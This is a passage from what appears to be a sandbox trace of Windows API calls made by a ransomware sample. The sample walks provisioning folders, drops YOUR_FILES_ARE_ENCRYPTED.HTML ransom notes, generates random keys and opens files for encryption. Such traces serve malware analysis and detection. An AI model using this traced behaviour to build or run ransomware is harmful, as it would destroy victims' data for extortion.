ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0 [0106.865] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.865] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.865] GetProcessHeap () returned 0x600000 [0106.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.865] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.868] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.868] CloseHandle (hObject=0x314) returned 1 [0106.869] GetProcessHeap () returned 0x600000 [0106.869] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.869] GetProcessHeap () returned 0x600000 [0106.869] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.870] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2173cb2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2173cb2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.870] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.870] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml") returned 97 [0106.870] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.870] lstrlenW (lpString=".xml") returned 4 [0106.870] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.870] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.870] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.870] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=579) returned 1 [0106.870] GetProcessHeap () returned 0x600000 [0106.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.874] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="E0") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="0A") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="73") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="B9") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="F0") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="49") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AC") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="DB") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="9C") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="2C") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="2E") returned 2 [0106.874] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="20") returned 2 [0106.874] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="04") returned 2 [0106.874] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="8A") returned 2 [0106.874] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="6C") returned 2 [0106.874] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="E8") returned 2 [0106.874] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="79") returned 2 [0106.874] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="5A") returned 2 [0106.874] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="66") returned 2 [0106.874] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="2E") returned 2 [0106.874] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="A6") returned 2 [0106.875] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="03") returned 2 [0106.875] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="CD") returned 2 [0106.875] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="B1") returned 2 [0106.875] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="7B") returned 2 [0106.875] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="C7") returned 2 [0106.875] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="EB") returned 2 [0106.875] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="F9") returned 2 [0106.875] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="B0") returned 2 [0106.875] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="3C") returned 2 [0106.875] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="63") returned 2 [0106.875] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="72") returned 2 [0106.876] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" [0106.876] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.876] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.878] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2173cb2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2173cb2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.887] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.887] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.887] GetProcessHeap () returned 0x600000 [0106.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0106.889] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.889] CloseHandle (hObject=0x31c) returned 1 [0106.890] GetProcessHeap () returned 0x600000 [0106.890] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.890] GetProcessHeap () returned 0x600000 [0106.890] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.890] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.891] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.891] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.891] GetProcessHeap () returned 0x600000 [0106.891] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0106.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.891] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.892] CloseHandle (hObject=0x308) returned 1 [0106.893] GetProcessHeap () returned 0x600000 [0106.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0106.893] GetProcessHeap () returned 0x600000 [0106.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.894] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", cAlternateFileName="{7A30A~1")) returned 1 [0106.894] StrStrIW (lpFirst="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.894] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned 80 [0106.894] GetProcessHeap () returned 0x600000 [0106.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.895] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" [0106.895] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*" [0106.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.897] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.897] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c629f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c629f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1c88c62, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1f35, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.897] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.897] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned 99 [0106.897] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.897] lstrlenW (lpString=".xml") returned 4 [0106.897] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.897] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.897] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.897] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=7989) returned 1 [0106.897] GetProcessHeap () returned 0x600000 [0106.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.900] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="29") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="EE") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F4") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="7D") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="EF") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="9F") returned 2 [0106.900] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="C1") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="59") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="36") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="3B") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="83") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="17") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6A") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="12") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="7F") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E9") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="D3") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1F") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="F7") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="60") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7F") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="81") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E6") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="B7") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="41") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="67") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="0D") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="86") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="D4") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="A6") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="81") returned 2 [0106.900] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="29") returned 2 [0106.901] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" [0106.901] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.901] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.901] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.901] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml") returned 100 [0106.901] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.901] lstrlenW (lpString=".xml") returned 4 [0106.901] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.901] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.901] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.902] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.902] CloseHandle (hObject=0x314) returned 1 [0106.902] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.902] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.903] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned 85 [0106.903] GetProcessHeap () returned 0x600000 [0106.903] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.903] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" [0106.903] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*" [0106.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626638 [0106.904] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.904] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.904] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.904] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned 93 [0106.904] GetProcessHeap () returned 0x600000 [0106.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.905] lstrcpyW (in: 